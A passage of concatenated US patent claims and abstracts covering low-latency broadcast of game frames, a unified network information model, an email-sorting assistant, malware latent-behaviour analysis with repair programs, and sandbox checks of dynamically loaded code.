a processor; memory; a frame extractor stored in the memory and executable by the processor to access frame data generated by a rendering pipeline of a frame generation engine and to export the frame data for use external to the frame generation engine; and a broadcasting agent stored in the memory and executable by the processor to broadcast the frame data exported from the frame generation engine for viewing on a remote spectating device. 15. The device of claim 14, wherein the frame generation engine is a game engine. 16. The device of claim 14, wherein the frame data includes unmodified output of a graphics processing unit application programming interface (GPU API), the GPU API communicatively coupled to the frame generation engine along the rendering pipeline. 17. The device of claim 16, further comprising:
an encoder stored in memory and executable to receive and encode the frame data generated by the GPU API. 18. The device of claim 14, wherein the frame extractor accesses the frame data by initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 19. The device of claim 18, wherein the frame extractor uses the pointer to draw data of the object onto input of an encoder. 20. The device of claim 14, wherein the frame extractor exports the frame data for external use by a computing module stored in the memory, the computing module being higher-level than the frame generation engine with respect to a graphics processing unit (GPU). | A system for low latency broadcast of animation frames includes a frame extractor stored in memory and executable to access frame data generated by a rendering pipeline of a frame generation engine. During runtime of the frame generation engine, the frame extractor exports the frame data for use external to the frame generation engine.1. A system for low-latency communication of frame data comprising:
a processor; memory; a frame extractor stored in memory and executable by the processor to access frame data generated by a rendering pipeline of a frame generation engine and to export the frame data for use external to the frame generation engine; and a broadcasting agent stored in the memory and executable by the processor to broadcast the frame data exported from the frame generation engine for viewing on a remote spectating device. 2. The system of claim 1, wherein the frame generation engine is a game engine. 3. The system of claim 1, wherein the frame generation engine is communicatively coupled to a graphics processing unit application programming interface (GPU API) via the rendering pipeline and the frame data is generated by the GPU API. 4. The system of claim 2, wherein the GPU API renders the frame data onto input of an encoder external to the frame generation engine without modifying the frame data. 5. The system of claim 4, wherein the broadcasting agent is executable to receive encoded frame data output from the encoder and to broadcast the encoded frame data to a spectating system for viewing on a remote spectating device. 6. The system of claim 1, wherein the frame extractor accesses the frame data by initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 7. The system of claim 6, wherein the frame extractor is further executable to use the pointer to draw data of the object onto input of an encoder. 8. One or more tangible computer-readable storage media of a tangible article of manufacture encoding computer-executable instructions for executing on a computer system a computer process, the computer process comprising:
accessing frame data generated by a rendering pipeline of a frame generation engine; exporting the frame data for use external to the frame generation engine; and broadcasting the exported frame data for viewing on a remote spectating device. 9. The one or more tangible computer-readable storage media of claim 8, wherein the frame generation engine is a game engine. 10. The one or more tangible computer-readable storage media system of claim 8, wherein the frame generation engine is communicatively coupled to a graphics processing unit application programming interface (GPU API) via the rendering pipeline and the frame data is generated by the GPU API. 11. The one or more tangible computer-readable storage media of claim 8, wherein the computer process further comprises:
rendering the frame data onto input of an encoder external to the frame generation engine without altering a format of the frame data. 12. The one or more tangible computer-readable storage media of claim 8, wherein accessing the frame data further comprises:
initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 13. The one or more tangible computer-readable storage media of claim 12, further comprising:
using the received pointer to draw data of the object onto input of the encoder. 14. A device comprising:
a processor; memory; a frame extractor stored in the memory and executable by the processor to access frame data generated by a rendering pipeline of a frame generation engine and to export the frame data for use external to the frame generation engine; and a broadcasting agent stored in the memory and executable by the processor to broadcast the frame data exported from the frame generation engine for viewing on a remote spectating device. 15. The device of claim 14, wherein the frame generation engine is a game engine. 16. The device of claim 14, wherein the frame data includes unmodified output of a graphics processing unit application programming interface (GPU API), the GPU API communicatively coupled to the frame generation engine along the rendering pipeline. 17. The device of claim 16, further comprising:
an encoder stored in memory and executable to receive and encode the frame data generated by the GPU API. 18. The device of claim 14, wherein the frame extractor accesses the frame data by initializing a rendering context of the frame generation engine, the rendering context of the frame generation engine associated with a pointer identifying a location of an object created by a GPU API and usable by the frame generation engine to render frames to a display. 19. The device of claim 18, wherein the frame extractor uses the pointer to draw data of the object onto input of an encoder. 20. The device of claim 14, wherein the frame extractor exports the frame data for external use by a computing module stored in the memory, the computing module being higher-level than the frame generation engine with respect to a graphics processing unit (GPU). | 2,400 |
9,145 | 9,145 | 16,045,817 | 2,445 | Systems and methods for managing and controlling a network include representing at least a portion of the network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions in the network related to networking, computing, and storage utilizing an architecture of elements representing bit transport, bit transformation and bit storage actions of the network; and managing elements and devices associated with the portion of the network utilizing the information model, wherein the elements and devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the elements and devices. | 1. A method for managing and controlling a network, the method comprising:
representing at least a portion of the network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions related to networking, computing, and storage utilizing the architecture via elements representing bit transport, bit transformation and bit storage actions; and managing devices associated with the portion of the network utilizing the information model, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 2. The method of claim 1, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 3. The method of claim 1, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 4. The method of claim 3, wherein the recursive architecture recuses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 5. The method of claim 3, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 6. The method of claim 3, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. 7. The method of claim 3, wherein, for the computing and the storage, files or code is treated as elements which are sources or sinks of information. 8. A network management system comprising at least one processor executing software instructions implementing the steps of:
representing at least a portion of a network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions related to networking, computing, and storage utilizing the architecture via elements representing bit transport, bit transformation and bit storage actions; and managing devices associated with the portion of the network utilizing the information model, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 9. The network management system of claim 8, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 10. The network management system of claim 8, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 11. The network management system of claim 10, wherein the recursive architecture recuses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 12. The network management system of claim 10, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 13. The network management system of claim 10, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. 14. The network management system of claim 10, wherein, for the computing and the storage, files or code is treated as elements which are sources or sinks of information. 15. A non-transitory computer-readable storage medium storing software instructions for controlling at least one computer to implement a model-view controller system comprising an information model of a network, the information model including:
an architecture unifying networking, computing, and storage in at least a portion of the network together; elements representing bit transport, bit transformation and bit storage actions to model functions in the architecture related to networking, computing, and storage, wherein devices associated with the portion of the network utilize the information model for management thereof, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 16. The non-transitory computer-readable storage medium of claim 15, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 17. The non-transitory computer-readable storage medium of claim 15, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 18. The non-transitory computer-readable storage medium of claim 17, wherein the recursive architecture recuses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 19. The non-transitory computer-readable storage medium of claim 17, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 20. The non-transitory computer-readable storage medium of claim 17, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. | Systems and methods for managing and controlling a network include representing at least a portion of the network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions in the network related to networking, computing, and storage utilizing an architecture of elements representing bit transport, bit transformation and bit storage actions of the network; and managing elements and devices associated with the portion of the network utilizing the information model, wherein the elements and devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the elements and devices.1. A method for managing and controlling a network, the method comprising:
representing at least a portion of the network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions related to networking, computing, and storage utilizing the architecture via elements representing bit transport, bit transformation and bit storage actions; and managing devices associated with the portion of the network utilizing the information model, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 2. The method of claim 1, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 3. The method of claim 1, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 4. The method of claim 3, wherein the recursive architecture recuses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 5. The method of claim 3, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 6. The method of claim 3, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. 7. The method of claim 3, wherein, for the computing and the storage, files or code is treated as elements which are sources or sinks of information. 8. A network management system comprising at least one processor executing software instructions implementing the steps of:
representing at least a portion of a network via an information model that has an architecture unifying networking, computing, and storage together; modeling functions related to networking, computing, and storage utilizing the architecture via elements representing bit transport, bit transformation and bit storage actions; and managing devices associated with the portion of the network utilizing the information model, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 9. The network management system of claim 8, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 10. The network management system of claim 8, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 11. The network management system of claim 10, wherein the recursive architecture recuses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 12. The network management system of claim 10, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 13. The network management system of claim 10, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. 14. The network management system of claim 10, wherein, for the computing and the storage, files or code is treated as elements which are sources or sinks of information. 15. A non-transitory computer-readable storage medium storing software instructions for controlling at least one computer to implement a model-view controller system comprising an information model of a network, the information model including:
an architecture unifying networking, computing, and storage in at least a portion of the network together; elements representing bit transport, bit transformation and bit storage actions to model functions in the architecture related to networking, computing, and storage, wherein devices associated with the portion of the network utilize the information model for management thereof, wherein the devices are configured to perform the networking, computing, and storage in the portion of the network, wherein the information model is used to represent functionality of the elements and devices with respect to the networking, computing, and storage in a generic manner independent of technology, implementation, and protocol of the devices. 16. The non-transitory computer-readable storage medium of claim 15, wherein the managing comprises utilizing a data model which is specific to the technology, implementation, and protocol of the elements and devices to interact between the information model and the elements and devices. 17. The non-transitory computer-readable storage medium of claim 15, wherein the architecture comprises a recursive architecture of layers and inter-layer links, each layer including one or more elements configured to use a respective information type, and each inter-layer link defining a client-server relationship between a respective pair of adjacent layers. 18. The non-transitory computer-readable storage medium of claim 17, wherein the recursive architecture recuses in two dimensions comprising within a layer via subnetworks and intra-layer links and between layers via adaptation and termination functions and the inter-layer links. 19. The non-transitory computer-readable storage medium of claim 17, wherein each of the networking, computing, and storage is represented by the recursive architecture of the layers and the inter-layer links. 20. The non-transitory computer-readable storage medium of claim 17, wherein, for the computing, Universal Turing Machines (UTMs) are defined as elements in the architecture with the intra-layer links and the inter-layer links defining relationships between UTMs. | 2,400 |
9,146 | 9,146 | 13,804,914 | 2,419 | Technologies are generally described for providing an email assistant for sorting through emails received at an email application. The email assistant may prioritize emails and group high and low priority emails separately to enable a user to quickly view and manage an email inbox. The email assistant may also provide suggestions on how to sort and manage emails in the inbox of the email application. The email assistant may observe a user's pattern of interactions with types of emails, and prioritize emails and suggest actions based on the user's interactions. The email assistant may be configured to automatically sort emails and provide management suggestions based on a detected scenario such as a user's return after a period of time away, a large influx of emails, and presence detection. | 1. A method to be executed at least in part in a computing device for providing an email assistant for sorting and managing emails, the method comprising:
detecting a plurality of emails received through an email application; prioritizing the emails into two or more groups; grouping the prioritized emails in respective folders; and displaying a suggestion pane providing suggested actions for managing the folders of prioritized emails. 2. The method of claim 1, further comprising:
analyzing a user's pattern of interactions with received emails; and determining a number of groups and prioritizing the emails into the groups based on the analysis of the user's pattern of interactions. 3. The method of claim 1, wherein prioritizing the emails into the groups comprises:
determining one or more characteristics associated with each email, the characteristics including a sender, a subject, and a domain name of the sender; and identifying a user action associated with an email of similar characteristics, the user action including one or more of deleting, ignoring, delaying a response to, flagging, saving, and replying to the email of similar characteristics. 4. The method of claim 1, wherein the two or more groups include a group of high priority emails and a group of low priority emails. 5. The method of claim 4, further comprising:
displaying a folder of low priority emails in a separate section from a folder of high priority emails on a user interface of the email application, wherein the folder of low priority emails hides the low priority emails from view. 6. The method of claim 5, further comprising:
providing an expansion control for expanding the folder of low priority emails to display the low priority emails. 7. The method of claim 4, further comprising:
displaying the folder of low priority emails and the folder of high priority emails in separate sections presented on a toolbar of the email application; and upon receiving a selection one of the folder of low priority emails and the folder of high priority emails on the toolbar, displaying a list of emails included in the selected folder. 8. The method of claim 7, further comprising:
providing a control for a bulk action associated with the folder of low priority emails to delete the emails included in the folder of low priority emails. 9. The method of claim 7, further comprising:
enabling the user to move a selected email from the folder of low priority emails to the folder of high priority emails. 10. The method of claim 1, further comprising:
automatically displaying the suggestion pane based on one of: a number of emails, detection of a user's return after a period of time away, detection of a change in the user's presence status, and a predefined time during a day. 11. The method of claim 1, the suggested actions comprise one or more of: a bulk action to delete emails in a selected group, an action to view a list of emails included in a selected group, an action to view a list of emails sharing a common characteristic, and no action. 12. A computing device for providing an email assistant for sorting and managing emails, the computing device comprising:
a memory; a display; and a processor coupled to the memory and the display, the processor configured to provide a user interface associated with an email application, wherein the email application is configured to:
detect a plurality of emails received through an email application;
analyze a user's pattern of interactions with received emails;
determine a number of groups for the received emails and prioritize the emails into two or more groups based on the analysis of the user's pattern of interactions;
group the prioritized emails in respective folders; and
display a suggestion pane providing suggested actions for managing the folders of prioritized emails based on the analysis of the user's pattern of interactions. 13. The computing device of claim 12, wherein the email application is further configured to:
perform a suggested action automatically based on the analysis of the user's pattern of interactions. 14. The computing device of claim 12, wherein the email application is further configured to:
display a control for a suggested action on each email listed within a folder of emails. 15. The computing device of claim 12, wherein the email application is further configured to:
provide a control for a bulk action associated with at least one of the folders on the suggestion pane; and upon user activation of the control for the bulk action, display a confirmation of the bulk action. 16. The computing device of claim 12, wherein the email application is further configured to enable user interaction with the user interface through one or more of: a touch input, a gesture input, a keyboard input, a mouse input, a pen input, a voice command, and an eye-tracking input. 17. The computing device of claim 12, wherein the email application is one of a hosted service accessed through a browser executed on the computing device and a locally installed application executed on the computing device. 18. A computer-readable memory device with instructions stored thereon for providing an email assistant for sorting and managing emails, the instructions comprising:
analyzing a user's pattern of interactions with received emails; detecting a plurality of emails received through an email application; determining a number of groups and prioritizing the emails into two or more groups based on the analysis of the user's pattern of interactions; grouping the prioritized emails in respective folders; and displaying a suggestion pane providing suggested actions for managing the folders of prioritized emails based on one of: a number of emails, detection of a user's return after a period of time away, detection of a change in the user's presence status, and a predefined time during a day. 19. The computer-readable memory device of claim 18, wherein the instructions further comprise:
displaying different viewing and sorting suggestions based on a client device used for viewing a user interface of the email application. 20. The computer-readable memory device of claim 19, wherein the instructions further comprise:
activating the email assistant at predefined times configurable by a user. | Technologies are generally described for providing an email assistant for sorting through emails received at an email application. The email assistant may prioritize emails and group high and low priority emails separately to enable a user to quickly view and manage an email inbox. The email assistant may also provide suggestions on how to sort and manage emails in the inbox of the email application. The email assistant may observe a user's pattern of interactions with types of emails, and prioritize emails and suggest actions based on the user's interactions. The email assistant may be configured to automatically sort emails and provide management suggestions based on a detected scenario such as a user's return after a period of time away, a large influx of emails, and presence detection.1. A method to be executed at least in part in a computing device for providing an email assistant for sorting and managing emails, the method comprising:
detecting a plurality of emails received through an email application; prioritizing the emails into two or more groups; grouping the prioritized emails in respective folders; and displaying a suggestion pane providing suggested actions for managing the folders of prioritized emails. 2. The method of claim 1, further comprising:
analyzing a user's pattern of interactions with received emails; and determining a number of groups and prioritizing the emails into the groups based on the analysis of the user's pattern of interactions. 3. The method of claim 1, wherein prioritizing the emails into the groups comprises:
determining one or more characteristics associated with each email, the characteristics including a sender, a subject, and a domain name of the sender; and identifying a user action associated with an email of similar characteristics, the user action including one or more of deleting, ignoring, delaying a response to, flagging, saving, and replying to the email of similar characteristics. 4. The method of claim 1, wherein the two or more groups include a group of high priority emails and a group of low priority emails. 5. The method of claim 4, further comprising:
displaying a folder of low priority emails in a separate section from a folder of high priority emails on a user interface of the email application, wherein the folder of low priority emails hides the low priority emails from view. 6. The method of claim 5, further comprising:
providing an expansion control for expanding the folder of low priority emails to display the low priority emails. 7. The method of claim 4, further comprising:
displaying the folder of low priority emails and the folder of high priority emails in separate sections presented on a toolbar of the email application; and upon receiving a selection one of the folder of low priority emails and the folder of high priority emails on the toolbar, displaying a list of emails included in the selected folder. 8. The method of claim 7, further comprising:
providing a control for a bulk action associated with the folder of low priority emails to delete the emails included in the folder of low priority emails. 9. The method of claim 7, further comprising:
enabling the user to move a selected email from the folder of low priority emails to the folder of high priority emails. 10. The method of claim 1, further comprising:
automatically displaying the suggestion pane based on one of: a number of emails, detection of a user's return after a period of time away, detection of a change in the user's presence status, and a predefined time during a day. 11. The method of claim 1, the suggested actions comprise one or more of: a bulk action to delete emails in a selected group, an action to view a list of emails included in a selected group, an action to view a list of emails sharing a common characteristic, and no action. 12. A computing device for providing an email assistant for sorting and managing emails, the computing device comprising:
a memory; a display; and a processor coupled to the memory and the display, the processor configured to provide a user interface associated with an email application, wherein the email application is configured to:
detect a plurality of emails received through an email application;
analyze a user's pattern of interactions with received emails;
determine a number of groups for the received emails and prioritize the emails into two or more groups based on the analysis of the user's pattern of interactions;
group the prioritized emails in respective folders; and
display a suggestion pane providing suggested actions for managing the folders of prioritized emails based on the analysis of the user's pattern of interactions. 13. The computing device of claim 12, wherein the email application is further configured to:
perform a suggested action automatically based on the analysis of the user's pattern of interactions. 14. The computing device of claim 12, wherein the email application is further configured to:
display a control for a suggested action on each email listed within a folder of emails. 15. The computing device of claim 12, wherein the email application is further configured to:
provide a control for a bulk action associated with at least one of the folders on the suggestion pane; and upon user activation of the control for the bulk action, display a confirmation of the bulk action. 16. The computing device of claim 12, wherein the email application is further configured to enable user interaction with the user interface through one or more of: a touch input, a gesture input, a keyboard input, a mouse input, a pen input, a voice command, and an eye-tracking input. 17. The computing device of claim 12, wherein the email application is one of a hosted service accessed through a browser executed on the computing device and a locally installed application executed on the computing device. 18. A computer-readable memory device with instructions stored thereon for providing an email assistant for sorting and managing emails, the instructions comprising:
analyzing a user's pattern of interactions with received emails; detecting a plurality of emails received through an email application; determining a number of groups and prioritizing the emails into two or more groups based on the analysis of the user's pattern of interactions; grouping the prioritized emails in respective folders; and displaying a suggestion pane providing suggested actions for managing the folders of prioritized emails based on one of: a number of emails, detection of a user's return after a period of time away, detection of a change in the user's presence status, and a predefined time during a day. 19. The computer-readable memory device of claim 18, wherein the instructions further comprise:
displaying different viewing and sorting suggestions based on a client device used for viewing a user interface of the email application. 20. The computer-readable memory device of claim 19, wherein the instructions further comprise:
activating the email assistant at predefined times configurable by a user. | 2,400 |
9,147 | 9,147 | 16,113,154 | 2,439 | The present disclosure relates to malware and, more particularly, towards systems and methods of processing information associated with detecting and handling malware. According to certain illustrative implementations, methods of processing malware are disclosed. Moreover, such methods may include one or more of unpacking and/or decrypting malware samples, dynamically analyzing the samples, disassembling and/or reverse engineering the samples, performing static analysis of the samples, determining latent logic execution path information regarding the samples, classifying the samples, and/or providing intelligent report information regarding the samples. | 1-83. (canceled) 84. At least one non-transitory computer-readable medium comprising instructions, that, when executed by a processor, are to:
execute malware code within a native operating system of the malware code; generate a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code; generate a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of the executed logic paths; identify a latent behavior of the malware code based on the log of the non-executed logic paths; and create a malware repair program based on the log of the executed logic paths and the log of the non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 85. The at least one non-transitory computer-readable medium of claim 84, wherein the latent behavior of the malware code comprises a malicious code triggers execution based on a condition. 86. The at least one non-transitory computer-readable medium of claim 85, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 87. The at least one non-transitory computer-readable medium of claim 84, wherein the instructions, when executed by the processor, are to:
prepare a boot image in an operating system that is different from the native operating system of the malware code. 88. The at least one non-transitory computer-readable medium of claim 87, wherein the instructions, when executed by the processor, are to:
generate an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 89. The at least one non-transitory computer-readable medium of claim 84, wherein the instructions, when executed by the processor, are to:
generate a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. 90. The at least one non-transitory computer-readable medium of claim 89, wherein the graph comprises an electronic graphical representation of the executed logic paths and the non-executed logic paths of the malware code, the electronic graphical representation comprising:
a first indicia representing the executed logic paths, and a second indicia representing the non-executed logic paths. 91. An apparatus comprising:
an analysis component configured to:
execute malware code within a native operating system of the malware code; and
generate a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code;
a management component configured to:
generate a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of executed logic paths;
identify a latent behavior of the malware code based on the log of non-executed logic paths; and
create a malware repair program based on the log of executed logic paths and the log of non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 92. The apparatus of claim 91, wherein the management component operates in an operating system that is different from the native operating system of the malware code. 93. The apparatus of claim 91, wherein the latent behavior of the malware code comprises a malicious code that triggers execution based on a condition. 94. The apparatus of claim 93, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 95. The apparatus of claim 91, wherein the management component is configured to:
prepare a boot image in an operating system that is different from the native operating system of the malware code. 96. The apparatus of claim 95, wherein the management component is configured to:
generate an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 97. The apparatus of claim 91, wherein the management component is configured to:
generate a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. 98. A method comprising:
executing malware code within a native operating system of the malware code; generating a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code; generating a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of executed logic paths; identifying a latent behavior of the malware code based on the log of non-executed logic paths; and creating a malware repair program based on the log of executed logic paths and the log of non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 99. The method of claim 98, wherein the latent behavior of the malware code comprises a malicious code triggers execution based on a condition. 100. The method of claim 99, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 101. The method of claim 98, further comprising:
preparing a boot image in an operating system that is different from the native operating system of the malware code. 102. The method of claim 101, further comprising: generating an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 103. The method of claim 98, further comprising:
generating a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. | The present disclosure relates to malware and, more particularly, towards systems and methods of processing information associated with detecting and handling malware. According to certain illustrative implementations, methods of processing malware are disclosed. Moreover, such methods may include one or more of unpacking and/or decrypting malware samples, dynamically analyzing the samples, disassembling and/or reverse engineering the samples, performing static analysis of the samples, determining latent logic execution path information regarding the samples, classifying the samples, and/or providing intelligent report information regarding the samples.1-83. (canceled) 84. At least one non-transitory computer-readable medium comprising instructions, that, when executed by a processor, are to:
execute malware code within a native operating system of the malware code; generate a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code; generate a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of the executed logic paths; identify a latent behavior of the malware code based on the log of the non-executed logic paths; and create a malware repair program based on the log of the executed logic paths and the log of the non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 85. The at least one non-transitory computer-readable medium of claim 84, wherein the latent behavior of the malware code comprises a malicious code triggers execution based on a condition. 86. The at least one non-transitory computer-readable medium of claim 85, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 87. The at least one non-transitory computer-readable medium of claim 84, wherein the instructions, when executed by the processor, are to:
prepare a boot image in an operating system that is different from the native operating system of the malware code. 88. The at least one non-transitory computer-readable medium of claim 87, wherein the instructions, when executed by the processor, are to:
generate an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 89. The at least one non-transitory computer-readable medium of claim 84, wherein the instructions, when executed by the processor, are to:
generate a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. 90. The at least one non-transitory computer-readable medium of claim 89, wherein the graph comprises an electronic graphical representation of the executed logic paths and the non-executed logic paths of the malware code, the electronic graphical representation comprising:
a first indicia representing the executed logic paths, and a second indicia representing the non-executed logic paths. 91. An apparatus comprising:
an analysis component configured to:
execute malware code within a native operating system of the malware code; and
generate a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code;
a management component configured to:
generate a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of executed logic paths;
identify a latent behavior of the malware code based on the log of non-executed logic paths; and
create a malware repair program based on the log of executed logic paths and the log of non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 92. The apparatus of claim 91, wherein the management component operates in an operating system that is different from the native operating system of the malware code. 93. The apparatus of claim 91, wherein the latent behavior of the malware code comprises a malicious code that triggers execution based on a condition. 94. The apparatus of claim 93, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 95. The apparatus of claim 91, wherein the management component is configured to:
prepare a boot image in an operating system that is different from the native operating system of the malware code. 96. The apparatus of claim 95, wherein the management component is configured to:
generate an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 97. The apparatus of claim 91, wherein the management component is configured to:
generate a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. 98. A method comprising:
executing malware code within a native operating system of the malware code; generating a log of executed logic paths of the malware code that have been executed within the native operating system of the malware code; generating a log of non-executed logic paths of the malware code that have not been executed within the native operating system based on the log of executed logic paths; identifying a latent behavior of the malware code based on the log of non-executed logic paths; and creating a malware repair program based on the log of executed logic paths and the log of non-executed logic paths, the malware repair program comprising an instruction configured to reverse the latent behavior of the malware code. 99. The method of claim 98, wherein the latent behavior of the malware code comprises a malicious code triggers execution based on a condition. 100. The method of claim 99, wherein the condition has not been met based on the execution of the malware code within the native operating system of the malware code. 101. The method of claim 98, further comprising:
preparing a boot image in an operating system that is different from the native operating system of the malware code. 102. The method of claim 101, further comprising: generating an executable program configured to access a file system of the native operating system of the malware code through the boot image that does not activate the native operating system of the malware code. 103. The method of claim 98, further comprising:
generating a graph of the executed logic paths and the non-executed logic paths based on the log of the executed logic paths and the log of the non-executed logic paths. | 2,400 |
9,148 | 9,148 | 15,413,941 | 2,435 | Disclosed are various embodiments for performing security verifications for dynamic applications. An application is executed and it is determined that the application requests access to dynamically loaded code. In response to determining a security risk associated with the dynamically loaded code, a portion of the dynamically loaded code is modified to eliminate the security risk. | 1. A system, comprising:
at least one computing device; and at least one application executable by the at least one computing device, wherein, when executed, the at least one application causes the at least one computing device to at least:
execute an instance of an application in a sandboxed environment;
determine that the instance of the application is requesting access to dynamically loaded code;
determine a security risk associated with the dynamically loaded code; and
modify a portion of the dynamically loaded code to eliminate the security risk, a remaining portion of the dynamically loaded code being unmodified. 2. The system of claim 1, wherein modifying a portion of the dynamically loaded code comprises repairing the portion of the dynamically loaded code. 3. The system of claim 1, wherein modifying the portion of the dynamically loaded code comprises replacing the portion of the dynamically loaded code with another portion of code. 4. The system of claim 1, wherein the application is one of a plurality of applications being offered for at least one of download or sale via an application marketplace. 5. The system of claim 1, wherein the security risk is determined based at least in part on at least one of: a version of the dynamically loaded code, a signature of the dynamically loaded code, a source of the dynamically loaded code, a previous security evaluation, a code inspection of the dynamically loaded code. 6. The system of claim 1, wherein determining that the application requests accesses the dynamically loaded code further comprises detecting of at least one of: a download of data to executable code memory of the at least one computing device or previously downloaded data including recognizable executable code. 7. A method, comprising:
